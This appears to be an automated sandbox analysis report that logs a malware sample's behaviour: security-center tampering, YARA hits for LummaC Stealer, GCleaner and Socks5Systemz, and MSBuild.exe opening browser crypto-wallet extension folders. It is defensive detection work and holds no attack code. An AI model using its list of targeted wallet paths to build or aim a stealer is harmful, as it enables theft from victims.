                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,12_2_00458670
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_004026C4 GetSystemTime,11_2_004026C4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00455644 GetUserNameA,12_2_00455644
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00405CF4 GetVersionExA,11_2_00405CF4
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Changes security center settings (notifications, updates, antivirus, firewall)
                            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                            Source: svchost.exe, 00000006.00000002.2528094804.000001C52FB02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: svchost.exe, 00000006.00000002.2528094804.000001C52FB02000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2282061438.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: MSBuild.exe, 00000017.00000002.2282661170.0000000000CCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dows Defender\MsMpeng.exe
                            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected GCleaner
                            Source: Yara matchFile source: 5.2.soft.exe.9e18000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.9f2c000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.a122000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.9f00000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.3.soft.exe.a122000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.soft.exe.9e44000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000003.1654814559.000000000A112000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1724312184.0000000009F2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1723674731.0000000009E18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1722279329.0000000009C4D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1724497364.000000000A122000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1723674731.0000000009E44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1724312184.0000000009F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4600, type: MEMORYSTR
                            Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000017.00000002.2274119949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Socks5Systemz
                            Source: Yara matchFile source: 0000000D.00000002.2540207459.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.2537786569.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ssdtoolbox.exe PID: 2236, type: MEMORYSTR
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                            Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                            Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                            Source: MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                            Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                            Source: powershell.exe, 00000012.00000002.2335459664.00007FFAAC430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
